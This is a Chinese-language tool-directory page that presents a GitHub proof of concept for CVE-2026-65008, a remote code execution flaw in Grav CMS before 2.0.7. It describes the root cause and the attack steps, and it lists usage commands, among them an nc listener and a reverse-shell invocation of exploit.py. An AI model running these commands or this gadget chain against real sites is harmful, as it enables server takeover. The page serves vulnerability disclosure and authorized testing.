Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-65008 — CVE-2026-65008 | Kitploit
工具/GitHubGitHub/zer0dayf/cve-2026-65008
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPapers & ResearchLearning & Education
GitHubzer0dayf/cve-2026-65008

CVE-2026-65008

CVE-2026-65008

查看仓库
123天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-65008 — Grav CMS < 2.0.7 认证 RCE

CVE-2026-65008 的概念验证:通过 Blueprint::dynamicData() 中不受限制的 call_user_func_array(),在 Grav CMS 中实现认证远程代码执行。

拥有 admin.pages(或 api.pages.write)权限的用户可以植入恶意表单 frontmatter。当任何访客(包括未认证用户)加载页面时,该载荷将以 Web 服务器用户身份执行。

仅限授权测试。 仅可用于您拥有或已获得明确书面许可进行测试的系统。

致谢

角色
漏洞报告者YuvalMil, MatiHub25, LeonKaya
厂商公告GHSA-fj2p-qj2f-74v5
本仓库独立实验室 PoC / 自动化

CVE: https://www.cve.org/CVERecord?id=CVE-2026-65008

根本原因

Blueprint::dynamicData() 将攻击者可控的 Class::method 可调用项及参数传递给 PHP call_user_func_array(),且无任何白名单限制。结合 Grav\Common\Utils::arrayFilterRecursive 作为跳板,最终可调用 system() / passthru 等函数。

已在 Grav 2.0.7+ 中修复。

CVSS

9.8 严重(CRITICAL) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

环境要求

  • Python 3.10+
  • requests

安装:

root@kitploit:~
pip install -r requirements.txt

使用方法

命令执行

root@kitploit:~
python3 exploit.py -u http://TARGET -U admin -P 'password' -c "id"

反向 Shell

先启动监听:

root@kitploit:~
nc -lvnp 4444

然后:

root@kitploit:~
python3 exploit.py -u http://TARGET -U admin -P 'password' --lhost YOUR_IP --lport 4444

参数

攻击流程

  1. 登录 /admin(提取 login-nonce)
  2. 从管理面板获取 admin_nonce
  3. 保存一个 frontmatter 中包含 data-opts@: gadget 的页面
  4. 通过未认证的 GET 请求触发 → 以 www-data 身份执行 RCE

免责声明

本项目仅用于教育和授权安全研究。作者不对滥用行为负责。测试第三方系统前,请务必获得书面许可。原始漏洞已通过厂商公告披露;本仓库仅用于演示实验室复现。

参考链接

  • https://github.com/getgrav/grav/security/advisories/GHSA-fj2p-qj2f-74v5
  • https://nvd.nist.gov/vuln/detail/CVE-2026-65008
  • https://www.cve.org/CVERecord?id=CVE-2026-65008

许可证

仅供研究使用。不提供任何担保。

下载工具
参数说明
-u, --url目标基础 URL(必填)
-U, --username管理员 / 页面编辑用户(默认:admin)
-P, --password密码(必填)
-c, --command要执行的命令(默认:id)
--lhost反向 Shell 的 LHOST
--lport反向 Shell 的 LPORT(默认:4444)
--folder页面文件夹名称(默认:rcepoc)
--no-verify禁用 TLS 验证